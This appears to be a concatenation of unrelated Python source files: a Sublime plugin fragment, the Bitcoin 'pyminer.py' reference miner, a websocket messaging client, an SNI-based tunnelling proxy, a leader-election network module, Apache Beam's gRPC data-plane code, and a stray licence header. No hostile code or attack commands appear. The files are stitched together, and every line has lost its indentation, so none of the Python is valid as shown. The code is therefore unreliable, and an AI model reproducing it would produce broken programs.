binpath = os.path.join(libdir, 'osx_colorpicker')
elif sublime.platform() == 'linux':
binpath = os.path.join(libdir, 'linux_colorpicker.py')
else:
binpath = os.path.join(libdir, 'win_colorpicker.exe')
def plugin_loaded():
if sublime.platform() == 'osx' or sublime.platform() == 'linux':
binfile = os.path.join(sublime.packages_path(), binpath)
if not os.access(binfile, os.X_OK):
os.chmod(binfile, 0o755)
if sublime_version == 2:
plugin_loaded()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4567
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
client.py
|
# Copyright 2016 Pavle Jonoski
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from troup.infrastructure import OutgoingChannelOverWS
from troup.distributed import Promise
from troup.threading import IntervalTimer
from troup.node import read_local_node_lock
from troup.messaging import message, serialize, deserialize, Message
from threading import Thread
from datetime import datetime, timedelta
class CallbackWrapper:
def __init__(self, callback, valid_for, promise=None, created_on=None):
self.callback = callback
self.valid_for = valid_for
self.created_on = created_on or datetime.now()
self.promise = promise or Promise()
def check_expired(self):
if datetime.now() > (timedelta(milliseconds=self.valid_for) + self.created_on):
self.promise.complete(error='Timeout', result=Exception('Timeout'))
def execute_callback(self, result):
if self.callback:
try:
self.callback(result)
except Exception as e:
print('Woops')
self.promise.complete(result=result)
class ChannelClient:
def __init__(self, nodes_specs=None, reply_timeout=5000, check_interval=5000):
self.nodes_ref = {}
self.channels = {}
self.callbacks = {}
self.reply_timeout = reply_timeout
self.check_interval = check_interval
self.maintenance_timer = self.__build_timer()
self.__build_nodes_refs__(nodes_specs)
def __build_nodes_refs__(self, nodes_specs):
for spec in nodes_specs:
parsed = spec.partition(':')
self.nodes_ref[parsed[0]] = parsed[2]
def __build_timer(self):
timer = IntervalTimer(interval=self.check_interval, offset=self.check_interval,
target=self.__check_expired_callbacks)
timer.start()
return timer
def __check_expired_callbacks(self):
for msgid, wrapper in self.callbacks.items():
wrapper.check_expired()
def __reg_wrapper(self, message, callback):
wrapper = CallbackWrapper(callback=callback, valid_for=5000)
self.callbacks[message.id] = wrapper
return wrapper
def __on_channel_data(self, data, channel):
msg = deserialize(data, Message)
if msg.headers.get('type') == 'reply':
self.__process_reply(msg)
def __process_reply(self, reply):
id = reply.headers.get('reply-for')
if not id:
raise Exception('Invalid reply %s' % reply)
wrapper = self.callbacks.get(id)
if wrapper:
if reply.data.get('error'):
wrapper.promise.complete(error=reply.data.get('reply'))
else:
wrapper.promise.complete(result=reply.data.get('reply'))
def send_message(self, message, to_node=None, on_reply=None):
def reply_callback_wrapper(*args, **kwargs):
if on_reply:
on_reply(*args, **kwargs)
wrapper_promise = Promise()
def do_send():
promises = []
if to_node:
promise = self.send_message_to_node(message, to_node, reply_callback_wrapper)
promises.append(promise)
else:
for name, node in self.nodes_ref.items():
promise = self.send_message_to_node(message, name, reply_callback_wrapper)
promises.append(promise)
results = []
for p in promises:
results.append(p.result)
if len(results) == 1:
wrapper_promise.complete(result=results[0])
else:
wrapper_promise.complete(result=True)
def run_in_thread():
try:
do_send()
except Exception as e:
wrapper_promise.complete(error=e)
Thread(target=run_in_thread).start()
return wrapper_promise
def send_message_to_node(self, message, node, on_reply):
channel = self.get_channel(node)
wrapper = self.__reg_wrapper(message=message, callback=on_reply)
ser_message = serialize(message)
channel.send(ser_message)
return wrapper.promise
def get_channel(self, for_node):
channel = self.channels.get(for_node)
if not channel:
channel = self.build_channel(for_node)
return channel
def build_channel(self, for_node):
ref = self.nodes_ref.get(for_node)
if not ref:
raise Exception('Unknown node reference [%s]' % for_node)
return self.create_channel(for_node, ref)
def create_channel(self, node_name, reference):
chn = OutgoingChannelOverWS(node_name, reference)
def on_data(data):
#print('DATA %s' % data)
self.__on_channel_data(data, channel=chn)
chn.register_listener(on_data)
chn.open()
self.channels[node_name] = chn
return chn
def shutdown(self):
for name, channel in self.channels.items():
channel.close()
self.maintenance_timer.cancel()
def client_to_local_node():
lock = read_local_node_lock()
client = ChannelClient(nodes_specs=['%s:%s' % (lock.get_info('name'), lock.get_info('url'))])
return client
class CommandAPI:
def __init__(self, channel_client):
self.channel_client = channel_client
def send(self, command, to_node=None, on_reply=None):
return self.channel_client.send_message(message=command, to_node=to_node, on_reply=on_reply)
def monitor(self, command_ref):
pass
def command(name, data):
return message(data=data).header('type', 'command').header('command', name).build()
def task(type, data, ttl=None, track_out=False, buffer=None):
return message().header('type', 'task').header('ttl', ttl).\
header('task-type', 'process').header('process-type', type).\
header('consume-out', track_out).header('buffer-size', buffer).\
value('process', data).build()
def shutdown(self):
self.channel_client.shutdown()
if __name__ == '__main__':
from argparse import ArgumentParser
from json import loads, dumps
parser = ArgumentParser(prog="troup.client", description="Low level troup system client")
parser.add_argument('--node', help='Node connection URL.', default='ws://localhost:7000')
parser.add_argument('-t', '--type', default='command', help='Message type. May be "command" or "task".')
parser.add_argument('-d', '--data', help='Message data. This is usually a JSON string.')
parser.add_argument('-H', '--header', nargs='+', help='Message headers in the form HEADER_NAME=VALUE.')
parser.add_argument('--reply-timeout', default=5000, help='Message reply timeout in milliseconds.')
parser.add_argument('--check-interval', default=1000, help='Interval to check for timeouts in milliseconds.')
parser.add_argument('-c', '--command', help='The command name. Used only when type is "command".')
parser.add_argument('-v', '--verbose', help='Be more verbose.', action='store_true')
parser.add_argument('--as-json', action='store_true',
help='Try to serialize the result as JSON and print it on stdout.')
args = parser.parse_args()
def printout(*arguments):
if args.verbose:
print(*arguments)
data = args.data or '{}'
data = loads(data)
mb = message(data=data)
for header in args.header or []:
try:
header_name, value = header.split('=')
mb.header(header_name, value)
except Exception as e:
raise Exception('Invalid header value %s' % header) from e
mb.header('type', args.type)
if args.type == 'command' and args.command:
mb.header('command', args.command)
try:
message = mb.build()
channel_client = ChannelClient(nodes_specs=['TARGET:%s'%args.node], reply_timeout=args.reply_timeout,
check_interval=args.check_interval)
api = CommandAPI(channel_client=channel_client)
printout('Sending to ', args.node)
promise = api.send(command=message, to_node='TARGET')
result = promise.result
if args.as_json:
print(dumps(result))
else:
print(result)
finally:
if api:
api.shutdown()
|
itcproxy.py
|
#!/usr/bin/env python
#
# Copyright 2017 Michal Belica <https://beli.sk>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
VERSION = '0.0.1'
PROG_NAME = "ItcProxy"
DESCRIPTION = 'ItcProxy - HTTP(S) intercepting proxy'
import SocketServer
import BaseHTTPServer
import scapy
import httplib
import select
import argparse
import threading
import time
import sys
from scapy_ssl_tls.ssl_tls import *
def data_loop(sock, outsock, shutdown=None, bufsize=4096):
while True:
(rtr, rtw, err) = select.select([sock, outsock], [], [sock, outsock], 1)
if shutdown is not None and shutdown.is_set(): break
for s in rtr:
if s == sock:
direction = 1 # from client to remote
elif s == outsock:
direction = 2 # from remote to client
else:
raise Exception("Unknown socket found in loop!")
data = s.recv(bufsize)
if len(data) == 0:
return
if direction == 1:
outsock.sendall(data)
else:
sock.sendall(data)
class TLSTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(4096)
tls = TLS(data)
#tls.show()
ssl_hs_type = tls.records[0].payload.type
if ssl_hs_type != 1:
raise Exception('Not client hello')
target_host = str(tls.records[0].payload[TLSExtServerNameIndication].server_names[0].data)
print "TLS request from %s:%d for %s" % ((self.client_address) + (target_host,))
out_con = httplib.HTTPConnection(self.server.upstream_host, self.server.upstream_port)
out_con.set_tunnel(target_host, 443)
out_con.send(data)
data_loop(self.request, out_con.sock)
self.request.close()
out_con.sock.close()
class HTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def handle_one_request(self):
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.send_error(414)
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
return
hostport = self.headers.get('host', None)
if self.path.startswith('http:') or self.command.upper() == 'CONNECT':
url = self.path
else:
if hostport is None:
raise Exception('Incoming request without full URL or Host header')
url = 'http://%s%s' % (hostport, self.path)
print "HTTP request from %s:%d for %s (%s %s)" % ((self.client_address) + (hostport, self.command, url))
length = int(self.headers.get('content_length', 0))
if length > 0:
data = self.rfile.read(length)
else:
data = None
self.headers['connection'] = 'close'
out_con = httplib.HTTPConnection(self.server.upstream_host, self.server.upstream_port)
out_con.putrequest(self.command, url, skip_host=1, skip_accept_encoding=1)
for hdr in self.headers.headers:
out_con._output(hdr.rstrip())
out_con.endheaders(data)
data_loop(self.request, out_con.sock)
self.request.close()
out_con.sock.close()
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def start_tls_server(host, port, upstream_host, upstream_port):
server = ThreadedTCPServer((host, port), TLSTCPHandler)
server.allow_reuse_address = True
server.upstream_host = upstream_host
server.upstream_port = upstream_port
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server_thread, server
def start_http_server(host, port, upstream_host, upstream_port):
server = ThreadedTCPServer((host, port), HTTPHandler)
server.allow_reuse_address = True
server.upstream_host = upstream_host
server.upstream_port = upstream_port
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server_thread, server
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument('-l', '--listen', default='', help='Listening address (default: any)')
parser.add_argument('-p', '--port', type=int, help='Listening HTTP port (default: disable)')
parser.add_argument('-t', '--tlsport', type=int, help='Listening TLS port (default: disable)')
parser.add_argument('upstream_host', help='Upstream HTTP proxy host')
parser.add_argument('upstream_port', type=int, help='Upstream HTTP proxy port')
parser.add_argument('-V', '--version', action='version',
version='{} {}'.format(PROG_NAME, VERSION))
args = parser.parse_args()
servers = []
if args.tlsport:
tls_server_thread, tls_server = start_tls_server(args.listen, args.tlsport, args.upstream_host, args.upstream_port)
servers.append(tls_server)
if args.port:
http_server_thread, http_server = start_http_server(args.listen, args.port, args.upstream_host, args.upstream_port)
servers.append(http_server)
if servers:
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print "Interrupted"
for server in servers:
server.shutdown()
server.server_close()
|
network.py
|
from threading import Thread
from collections import defaultdict, deque
import socket
import socketserver
from ..constants import PORT, Headers, Roles
import json
class Request:
def __init__(self, message, address):
message = json.loads(message)
self.header = message['header']
self.data = message['data']
self.client_address = address
def __repr__(self):
return f'(addr: {self.client_address}, header: {self.header}, data: {self.data})'
class Message:
def __init__(self, header, data, address):
self.header = header
self.data = data
self.address = address
def get_message(self):
return json.dumps({
'header': self.header,
'data': self.data,
})
class Network:
"""Docstring
"""
peers = []
request_queue = deque()
hold_back_queue = defaultdict(list)
last_seq = defaultdict(lambda: 0)
group_clock = 0
is_connected = False
leader_uid = None
leader_address = None
role = Roles.FOLLOWER
participant = False
def __init__(self, address=(socket.gethostbyname(socket.gethostname()), PORT)):
self.address = address
print(f'Assigned address {address[0]}:{address[1]}!')
self._establish_connection()
self._start_servers()
self.host = self.address[0]
self.uid = self.get_uid(self.host)
self.peers.append(self.host)
def initiate_election(self):
neighbor = self.get_neighbor()
message = Message(Headers.LEADER_ELECTION, {}, neighbor)
message.data['uid'] = self.uid
message.data['leader_address'] = self.host
message.data['isLeader'] = (self.uid == self.leader_uid)
self.unicast(message)
print('Election Initiated...')
def resolve_election(self, request):
neighbor = self.get_neighbor()
new_message = Message(Headers.LEADER_ELECTION, {}, neighbor)
pb_uid = int(request.data['uid'])
if request.data['isLeader']:
new_message.data['uid'] = request.data['uid']
new_message.data['isLeader'] = request.data['isLeader']
new_message.data['leader_address'] = request.data['leader_address']
self.leader_uid = pb_uid
self.leader_address = request.data['leader_address']
self.participant = False
self.unicast(new_message)
elif pb_uid < self.uid and not self.participant:
new_message.data['uid'] = self.uid
new_message.data['isLeader'] = False
new_message.data['leader_address'] = request.data['leader_address']
self.participant = True
self.unicast(new_message)
elif pb_uid > self.uid:
new_message.data['uid'] = request.data['uid']
new_message.data['isLeader'] = request.data['isLeader']
new_message.data['leader_address'] = request.data['leader_address']
self.participant = True
self.unicast(new_message)
elif pb_uid == self.uid:
new_message.data['uid'] = self.uid
new_message.data['isLeader'] = True
new_message.data['leader_address'] = self.host
self.leader_uid = self.uid
self.leader_address = self.host
self.role = Roles.LEADER
self.participant = False
self.unicast(new_message)
def unicast(self, msg):
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
sock.connect((msg.address, PORT))
sock.sendall(bytes(msg.get_message(), 'utf-8'))
except socket.error as ex:
if msg.address in self.peers and msg.address != self.host:
self.peers.remove(msg.address)
if self.get_uid(msg.address) == self.leader_uid and not self.participant:
self.leader_uid = None
self.leader_address = None
self.initiate_election()
def multicast(self, msg):
if msg.data.get('group_clock') is None:
self.group_clock += 1
msg.data['group_clock'] = self.group_clock
broken_ip = self.address[0].split('.')
address = f'{broken_ip[0]}.{broken_ip[1]}.255.255'
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(bytes(msg.get_message(), 'utf-8'), (address, PORT))
def broadcast(self, msg):
broken_ip = self.address[0].split('.')
address = f'{broken_ip[0]}.{broken_ip[1]}.255.255'
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(bytes(msg.get_message(), 'utf-8'), (address, PORT))
def _establish_connection(self):
self.is_connected = True
def _start_servers(self):
if not self.is_connected:
raise Exception('Unexpected network behaviour.')
def compare_and_push(request):
# there is only one group.
if request.header == Headers.GROUP_UPDATE:
if self.last_seq[request.client_address] + 1 == request.data['group_clock']:
self.request_queue.append(request)
self.last_seq[request.client_address] += 1
# Clear the hold back queue here.
held_out = sorted(self.hold_back_queue[request.client_address], key=lambda x: x.data['group_clock'])
self.hold_back_queue[request.client_address].clear()
for req in held_out:
if self.last_seq[request.client_address] + 1 == req.data['group_clock']:
self.request_queue.append(req)
self.last_seq[request.client_address] += 1
else:
self.hold_back_queue[request.client_address].append(req)
neg_ack = Message(Headers.MSG_MISSING, { 'missed': self.last_seq[request.client_address] + 1 }, request.client_address)
self.unicast(neg_ack)
elif self.last_seq[request.client_address] < request.data['group_clock']:
self.hold_back_queue[request.client_address].append(request)
neg_ack = Message(Headers.MSG_MISSING, { 'missed': self.last_seq[request.client_address] + 1 }, request.client_address)
self.unicast(neg_ack)
else:
pass
else:
self.request_queue.append(request)
def udp_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind(('', PORT))
while True:
request, address = sock.recvfrom(8192)
request = Request(request, address[0])
self.peers.append(request.client_address)
self.peers = list(set(self.peers))
compare_and_push(request)
class RequestHandler(socketserver.BaseRequestHandler):
def handle(this):
self.peers.append(this.client_address[0])
self.peers = list(set(self.peers))
request = Request(this.request.recv(8192), this.client_address[0])
self.request_queue.append(request)
self.tcp_server = socketserver.ThreadingTCPServer(self.address, RequestHandler)
Thread(target=udp_server).start()
Thread(target=self.tcp_server.serve_forever).start()
print('Servers up and running...')
def get_request(self):
if self.request_queue:
return self.request_queue.popleft()
else:
return None
def get_neighbor(self):
ring = sorted(self.peers, key=lambda x: self.get_uid(x))
return ring[ring.index(self.address[0]) - 1]
def get_peers(self):
return self.peers
def get_uid(self, address):
return int(''.join(address.split('.')))
def get_leader_uid(self):
return self.leader_uid
def set_leader_uid(self, uid):
self.leader_uid = uid
def get_leader_address(self):
return self.leader_address
def set_leader_address(self, leader_address):
self.leader_address = leader_address
def get_role(self):
return self.role
def disconnect(self):
self.tcp_server.shutdown()
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import Queue as queue
import sys
import threading
import grpc
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(object):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been recieved
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of a instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_targets):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_targets(collection): expected targets
"""
received = self._receiving_queue(instruction_id)
done_targets = []
try:
while len(done_targets) < len(expected_targets):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._exc_info:
raise self.exc_info[0], self.exc_info[1], self.exc_info[2]
else:
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
finally:
# Instruction_ids are not reusable so Clean queue once we are done with
# an instruction_id
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane')
self._exc_info = sys.exc_info()
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(object):
"""An abstract factory for creating ``DataChannel``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self):
self._data_channel_cache = {}
self._lock = threading.Lock()
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
grpc_channel = grpc.insecure_channel(
url,
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options=[("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)])
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
common_utils.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=logging-format-interpolation
# pylint: disable=g-direct-tensorflow-import
